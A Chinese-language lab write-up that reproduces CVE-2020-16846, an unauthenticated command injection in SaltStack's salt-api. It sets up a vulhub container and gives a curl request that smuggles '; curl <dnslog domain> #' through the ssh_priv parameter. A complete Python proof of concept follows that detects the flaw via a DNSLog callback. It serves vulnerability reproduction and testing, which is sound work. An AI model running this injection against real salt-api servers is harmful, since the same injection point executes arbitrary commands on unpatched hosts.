环境搭建:
使用 vulhub,进入对应目录启动环境(容器会把 4505、4506、8000 三个端口映射到宿主机,其中 8000 为 salt-api 的 HTTPS 接口,另有 2222→22 的 SSH 映射):
[root@localhost ~]# cd /home/vulhub/saltstack/CVE-2020-16846/
[root@localhost CVE-2020-16846]# docker-compose up -d
查看端口:
[root@localhost CVE-2020-16846]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
0043f4957bd6 vulhub/saltstack:3002 "/usr/bin/dumb-init …" 6 seconds ago Up 5 seconds 0.0.0.0:4505-4506->4505-4506/tcp, :::4505-4506->4505-4506/tcp, 0.0.0.0:8000->8000/tcp, :::8000->8000/tcp, 0.0.0.0:2222->22/tcp, :::2222->22/tcp cve-2020-16846_saltstack_1
[root@localhost CVE-2020-16846]#
漏洞复现:
使用 KALI 向 https://your-ip:8000/run 发送如下数据包。漏洞点在于 salt-api 的 `ssh` client 会把 `ssh_priv` 参数未经过滤地拼接进 shell 命令,因此无需任何有效凭据(`eauth`、`fun` 可填任意值)即可注入命令;受影响的是 3002.1 之前的版本,修复版本为 3002.1 及对应的补丁版本(以官方公告为准)。下面的 `-k` 仅用于忽略实验环境的自签名证书;DNSLog 回显依赖第三方服务,只应在授权的测试环境中使用:
┌──(root💀kali)-[~]
└─# curl -v -sk -X POST https://192.168.10.10:8000/run \
-H 'Content-Type: application/json' \
-d '{"client":"ssh","tgt":"*","fun":"anything","eauth":"anything","ssh_priv":"/dev/null < /dev/null; curl erqqbd.dnslog.cn #"}'
POC 编写(脚本通过 DNSLog 回显判断注入的 curl 是否被执行,属于无回显盲注检测):
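"""PoC for CVE-2020-16846: command injection via the `ssh_priv` parameter of
the salt-api `ssh` client (unauthenticated).  Detection is blind: a `curl` to
a freshly issued dnslog.cn subdomain is injected, then the DNSLog records are
polled to see whether the domain was resolved.

Usage: python poc.py [https://target:8000/run]
Only run against systems you are authorised to test.
"""
import json
import random
import sys
import time

# Default target; override with the first command-line argument.
URL = "https://192.168.10.10:8000/run"
DNSLOG_BASE = "http://www.dnslog.cn"
# Seconds to wait for every HTTP call; the original had no timeout and could hang forever.
TIMEOUT = 10
# Seconds to wait between sending the payload and polling DNSLog.
SETTLE_SECONDS = 2


def build_payload(domain):
    """Return the JSON request body that injects `curl <domain>` through `ssh_priv`.

    `fun` and `eauth` can be anything: the injection happens before any
    authentication.  The value closes the stdin redirect of the command that
    salt-api builds, runs `curl`, and comments out the remainder with `#`.
    The body is built with json.dumps rather than string formatting so that
    an unexpected character in `domain` cannot break the JSON.
    """
    return json.dumps({
        "client": "ssh",
        "tgt": "*",
        "fun": "anything",
        "eauth": "anything",
        "ssh_priv": "/dev/null < /dev/null; curl %s #" % domain,
    })


def get_dnslog_domain(session):
    """Ask dnslog.cn for a new subdomain; the random `t` parameter defeats caching."""
    resp = session.get(f"{DNSLOG_BASE}/getdomain.php?t={random.random()}", timeout=TIMEOUT)
    resp.raise_for_status()
    return resp.text.strip()


def dnslog_has_record(session, domain):
    """Return True if dnslog.cn has logged a lookup for `domain`.

    Must use the same session as get_dnslog_domain(): the records appear to be
    tied to the session cookie issued with the domain.
    """
    resp = session.get(f"{DNSLOG_BASE}/getrecords.php?t={random.random()}", timeout=TIMEOUT)
    resp.raise_for_status()
    return domain in resp.text


def check(url):
    """Send the injection to `url` and return True if the DNS callback arrived."""
    import requests  # imported here so build_payload() stays usable without the dependency

    # The vulhub container serves a self-signed certificate; suppress the
    # InsecureRequestWarning that verify=False would otherwise print.
    requests.packages.urllib3.disable_warnings()
    session = requests.session()
    domain = get_dnslog_domain(session)
    headers = {"Content-Type": "application/json"}
    # verify=False only because this targets a lab host with a self-signed cert.
    requests.post(url, headers=headers, data=build_payload(domain), verify=False, timeout=TIMEOUT)
    time.sleep(SETTLE_SECONDS)  # give the injected curl time to resolve the name
    return dnslog_has_record(session, domain)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else URL
    if check(target):
        print("CVE-2020-16846 存在")
    else:
        print("CVE-2020-16846 未检测到(目标已修复,或 DNS 回显尚未到达)")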
pycharm运行结果: